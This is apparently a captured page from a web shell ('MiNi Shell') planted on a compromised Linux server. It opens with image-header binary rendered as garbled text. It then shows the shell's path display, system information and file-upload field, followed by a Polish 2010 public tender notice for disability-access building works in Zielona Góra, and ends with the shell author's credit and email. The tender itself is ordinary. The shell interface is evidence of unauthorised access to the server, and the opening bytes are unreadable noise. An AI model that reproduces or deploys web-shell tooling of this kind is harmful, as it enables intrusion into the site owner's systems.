JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100106/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100106/4418-N-2010.html

<p class="kh_header"><b>Zielona Góra: Przystosowanie budynku Poradni Psychologiczno- 
         Pedagogicznej dla  potrzeb osób niepełnosprawnych przy ul. Drzewnej 13 w Zielonej Górze.</b><br>
<b>Numer ogłoszenia: 4418 - 2010; data zamieszczenia: 06.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Poradnia Psychologiczno-Pedagogiczna , ul. Drzewna 13, 65-060 Zielona Góra, woj. lubuskie, tel. 0-68 324 16 95, faks 0-68 324 75 18.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poradniapsych-ped.bipzielonagora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przystosowanie budynku Poradni Psychologiczno- 
         Pedagogicznej dla  potrzeb osób niepełnosprawnych przy ul. Drzewnej 13 w Zielonej Górze..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.    Przedmiotem zamówienia jest przystosowanie budynku Poradni Psychologiczno- 
         Pedagogicznej dla  potrzeb osób niepełnosprawnych przy ul. Drzewnej 13 w Zielonej
         Górze. 
2. Szczegółowy opis wykonania robót zawarty jest w projekcie budowlanym, przedmiarach robót, specyfikacji technicznej wykonania i odbioru robót budowlanych robót stanowiących załączniki do SIWZ, Polskich Normach lub aprobatach technicznych, warunkach technicznych wykonawstwa i odbioru robót.
Przywołane w dokumentacji technicznej nazwy producentów materiałów służą wyłącznie do określenia ich ogólnej charakterystyki i nie ograniczają użycia materiałów innych producentów o parametrach nie gorszych od tych wskazanych w dokumentacji
3.   Zakres przedmiotu zamówienia obejmuje:
- Modernizację istniejących schodów; 
- Przebudowę klatki schodowej tak aby uzyskać miejsce na zamontowanie windy;  
- Przedłużenie i poszerzenie spocznika przed wejściem;
- Dobudowanie podjazdu dla inwalidów wraz z barierkami;
- Instalacje elektryczne.
4.  Wskaźniki techniczne:
Powierzchnia zabudowy podjazdu dla osób niepełnosprawnych		-           51,60 m2
Długość podjazdu							-	 9,30 m2
Szerokość łączna podjazdu						-	 5,55 m2
Wysokość szybu windy							-	11,65 m
Szerokość konstrukcji wsporczej windy					-	  1,80 m
Głębokość konstrukcji wsporczej wind					-	  2,00 m
Powierzchnia zabudowy konstrukcji windy				-	  3,60 m2
Wyposażenie istniejącej tablicy RS w aparaturę modułową		-	 1,00 szt
Zasilanie elektryczne maszynowni dźwigu hydraulicznego		-           10,00 m
Zasilanie elektryczne gniazda wtyczkowego w maszynowni		-	10,00 m
Instalacja oświetleniowa podjazdu i drzwi wejściowych			-	45,00 m
Przeniesienie istniejącego panelu zgłoszeniowego inst. domofonowej	-	 1,00 szt.
Linia telefoniczna do maszynowni dźwigu				-	35,00 m
Uziemienie konstrukcji dźwigu						-	15,00 m
Pomiary elektryczne							-	 2,00 kpl
5. Program użytkowy inwestycji:
1)	Modernizacja zespołu wejściowego do budynku - dobudowany zostanie podjazd dla inwalidów 
     składający  się z czterech pochylni
2)	Przebudowa klatki schodowej polegająca na uzyskaniu miejsca na zamontowanie windy
3)	Wykonanie samonośnej konstrukcji dla szybu windy 

6. Rodzaje robót:
   1) Roboty budowlane zewnętrzne i wewnętrzne - zakres robót ujęty w przedmiarze robót, projekcie i STWiOR;
	-	roboty rozbiórkowe
	-	roboty budowlane
2)  Wyposażenie i urządzenia 
	-	dostawa i montaż konstrukcji i przeszklenia szybu dźwigowego		-       1,00 kpl.
	-	dostawa i montaż dźwigu hydraulicznego				-       1,00 kpl.
3) demontaż i montaż urządzeń sanitarnych - zakres robót ujęty w przedmiarze robót
4) Instalacja elektryczna dot. zasilanie dźwigu, oświetlenie podjazdu, linia telefoniczna, uziemienie 
       konstrukcji    dźwigu, pomiary elektryczne - zakres robót ujęty w przedmiarze robót.
7. Wymagania organizacyjno - techniczne:
1) Projektowana przebudowa Poradni będzie odbywać się w okresie funkcjonowania obiektu.
    Dlatego też Wykonawca robót budowlanych powinien:
a) wykonać niezbędne prace zabezpieczające teren robót budowlanych przed dostępem dzieci, rodziców,  personelu oraz innych osób;
b) uzgodnić sposób zabezpieczenia terenu budowy z inspektorem nadzoru oraz z dyrektorem Poradni; 
c) okresy, w którym będą wykonywane roboty budowlane uciążliwe dla otoczenia (np. hałas) lub roboty
    stwarzające szczególne niebezpieczeństwo dla dzieci powinny być także każdorazowo uzgodnione przez  Wykonawcę z inspektorem nadzoru i dyrektorem Przedszkola;
2) Wszystkie prace budowlane należy wykonywać zgodnie z projektem budowlanym oraz zgodnie ze STWiOR -   (Specyfikacją techniczną wykonania i odbioru robót). Wszelkie roboty ulegające zakryciu i zanikające muszą   być odebrane przez inspektora nadzoru.
3)  Wszystkie wbudowywane materiały muszą posiadać stosowne certyfikaty lub aprobaty techniczne. 
4)  Obiekty (elementy) budowlane po wykonaniu powinny być poddane odbiorowi technicznemu (zgodnie 
       z wymaganiami przepisów) i przekazane w tym terminie do użytku. 
5)  Utylizacja odpadów - zgodnie z wytycznymi zawartymi w projekcie budowlanym i ogólnymi przepisami.
6)  Budynki przeznaczone na obiekty użyteczności publicznej powinny spełniać wszelkie warunki określone:
      a) rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych,   jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2002 r. Nr 75, poz. 690 z późn. zm.); 
      b) ustawą z dnia 24 sierpnia 1991 roku o ochronie przeciwpożarowej (Dz. U. z 2002 r. Nr 147, poz. 1229  - j.t. z późn. zm.).
7) Zgodnie z postanowieniami Decyzji Nr 664  z 2008 z dnia 11.09.2008 r. (pozwolenie na przebudowę i przystosowanie   Budynku Poradni Psychologiczno-Pedagogicznej do korzystania przez osoby niepełnosprawne)  kierownik robót jest obowiązany:
a)  prowadzić dziennik budowy oraz umieścić na budowie w widocznym miejscu tablicę informacyjną oraz  ogłoszenie, zawierające dane dotyczące bezpieczeństwa pracy i ochrony zdrowia;
b) co najmniej na 7 dni przed rozpoczęciem robót przekazać dyrektorowi Poradni oświadczenia
       kierownika robót stwierdzające sporządzenie planu bezpieczeństwa pracy i ochrony zdrowia oraz
       przyjęcie obowiązku kierowania robotami budowlanymi, a także zaświadczenie, o którym mowa
       w art. 12 ust. 7 ustawy - Prawo budowlane.
8. Obowiązki stron 
8.1. Zamawiający zobowiązany jest do:
1) przekazania Wykonawcy 1 kompletu projektu technicznego najpóźniej w dniu podpisania umowy,
2) wskazanie miejsca na zaplecze budowy i przekazania terenu budowy w terminie do 3 dni po podpisaniu   umowy,
3) zapewnienia nadzoru autorskiego i inwestorskiego,
4) dokonania odbioru końcowego przedmiotu umowy, 
8.2. Wykonawca zobowiązany jest do:    
1)	wykonania przedmiotu umowy z należytą starannością, zgodnie z obowiązującymi przepisami, normami technicznymi, zasadami sztuki budowlanej, ofertą i STWiOR, etyką zawodową oraz postanowieniami umowy;
2)	protokolarnego przejęcia terenu budowy;
3)	zorganizowania zaplecza budowy i jego zabezpieczenia z zachowaniem najwyższej staranności;
4)	utrzymania na bieżąco ładu i porządku na terenie wykonywanych prac w trakcie prowadzenia robót i po
ich zakończeniu;
5)	przygotowania i zgłoszenia przedmiotu umowy do odbioru końcowego, uczestniczenia w czynnościach
odbioru i zapewnienia usunięcia stwierdzonych wad;
6)	zapewnienia ciągłego kierowania robotami przez osoby o odpowiednich kwalifikacjach zawodowych posiadających potwierdzenie przynależności do właściwej Izby Inżynierskiej;
7)	niezwłocznego usunięcia, własnym staraniem i na koszt własny ewentualnych szkód powstałych 
z jego winy w związku z realizacją niniejszej umowy;
 Materiały
Wykonawca zobowiązuje się wykonać przedmiot umowy z materiałów własnych oraz urządzeń określonych w  Specyfikacji Istotnych Warunków Zamówienia.
Materiały i urządzenia użyte do wykonania przedmiotu umowy winny odpowiadać, co do jakości wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie, zgodnie  z art. 10 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2006 r. Nr 156, poz. 1118).
Na każde żądanie Zamawiającego Wykonawca zobowiązany jest okazać w stosunku do wskazanych materiałów i urządzeń oraz wymaganych przepisami dla tych materiałów i urządzeń, odpowiednie certyfikaty zgodności z obowiązującymi normami, aprobaty techniczne, atesty, świadectwa jakości, instrukcje obsługi, itp.
Dokumentację w tym zakresie Wykonawca winien przechowywać na budowie i przekazać ją Zamawiającemu w procedurze odbioru końcowego.
Wykonawca zapewni potrzebne oprzyrządowanie, potencjał ludzki oraz materiały wymagane do zbadania, na żądanie Zamawiającego, prawidłowości wykonania robót oraz jakości użytych materiałów przez Wykonawcę i Podwykonawców przy realizacji zadania.
Jeżeli w rezultacie przeprowadzonych badań okaże się, że zastosowane materiały bądź wykonanie robót, co do jakości są niezgodne z umową, to koszty badań dodatkowych oraz skutki z tym związane obciążą Wykonawcę.
Strony zgodnie postanawiają, iż wszystkie odstępstwa w zakresie: stosowana technologii robót, innych niż w dokumentacji technicznej, wymagają jednoznacznej i pisemnej akceptacji przez Zamawiającego. Warunek ten realizowany będzie w taki sposób, że Zamawiający może żądać od Wykonawcy, w każdej fazie robót, udzielenia szczegółowych informacji technicznych  o stosowanych materiałach i technologiach. 
9. Wykonawca na wykonany przedmiot zamówienia udzieli gwarancji należytego wykonania robót na
        okres  36 miesięcy oraz rękojmi za wady robót na okres przekraczający gwarancję o 6 miesięcy.
10. Termin wykonania przedmiotu umowy i zgłoszenie przez Wykonawcę Zamawiającemu gotowości do odbioru  końcowego z zastrzeżeniem ujętym w punkcie 2.2. ustala się na dzień 30 czerwca 2010 r.
W terminie do 10.03.2010 r. należy wykonać część robót budowlanych (w tym zakupy urządzeń, sprzętów  
   i  materiałów z dostawą na teren budowy) za kwotę brutto (z podatkiem VAT): 109 700,00 zł 
      (słownie złotych: sto dziewięć tysięcy siedemset  00 100). 
11  Wszystkie materiały muszą posiadać stosowne certyfikaty lub aprobaty techniczne. 
12.Zaleca się przeprowadzenie wizji lokalnej obiektu  -terenu objętego zamówieniem ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.21.50.00-7, 45.22.30.00-6, 45.23.32.50-6, 45.31.31.00-5, 45.31.10.00-0, 45.40.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie  przewiduje  wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.   W przetargu mogą wziąć udział Wykonawcy niewykluczeni na podstawie art. 24 ust. 1   ustawy pzp, spełniający warunki zawarte w art. 22 ust. 1  ustawy pzp.
2.  Ocena spełniania warunków udziału w postępowaniu zostanie dokonana zgodnie z formułą   spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 6.1.3) - 6.1.5) SIWZ.
3. 	Niespełnienie chociażby jednego z ww. warunków skutkować będzie wykluczeniem Wykonawcy z postępowania z uwzględnieniem art. 26 ust 3 ustawy pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Dokumenty i oświadczenia wymagane od Wykonawcy ubiegającego się o zamówienie:
1)	wypełniony formularz oferty wg załącznika Nr 1 do SIWZ;
2)	oświadczenie, że Wykonawca wykona zamówienie własnymi siłami lub określi część zamówienia, której wykonanie powierzy Podwykonawcom wg załącznika Nr 2 do SIWZ;
3)	wypełnione i podpisane oświadczenie o spełnianiu warunków art. 22 ust. 1  ustawy pzp wg załącznika Nr 3 do SIWZ;
4)	wypełnione i podpisane oświadczenie Wykonawcy zgodnie z art. 26 ust. 2a ustawy pzp w celu wykazania braku podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust.1 ustawy pzp wg załącznika Nr 4 do SIWZ;
5)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
6)      zaakceptowany projekty umowy wg załącznika Nr 5 do SIWZ;
7)   dokładnie wypełniony kosztorys ofertowy ( w polskich złotych , z dokładnością do dwóch miejsc po
         przecinku) wg załącznika Nr 6 do SIWZ
8) pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania
         Wykonawcy, o ile ofertę składa pełnomocnik lub przedstawiciel Wykonawcy.
2.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,
         zamiast dokumentów, o których mowa w:
3.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,
        zamiast dokumentów, o których mowa w pkt 6.1.5) SIWZ składa dokument wystawiony w kraju, w
        którym ma siedzibę lub miejsce zamieszkania, potwierdzający odpowiednio, że nie otwarto jego
         likwidacji ani nie ogłoszono upadłości. Dokument powinien być wystawiony nie wcześniej niż 6 miesięcy
         przed upływem terminu składania ofert;
4 Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce
          zamieszkania, nie wydaje się dokumentów o których mowa w pkt 6.2. SIWZ, zastępuje się je
          dokumentami zawierającym oświadczenie złożone przed notariuszem, właściwym organem
          sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego
          odpowiednio kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.poradniapsych-ped.bipzielonagora.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poradnia Psychologiczno-Pedagogicznej  , ul. Drzewna 13, 65-060 Zielona  Góra, cena 48,40 zł z wysyłką pocztową  53,00 zł..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2010 godzina 10:00, miejsce: Poradnia Psychologiczno-Pedagogiczna , ul. Drzewna 13, 65-060 Zielona  Góra,  gabinet dyrektora pokój nr 3 (parter)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com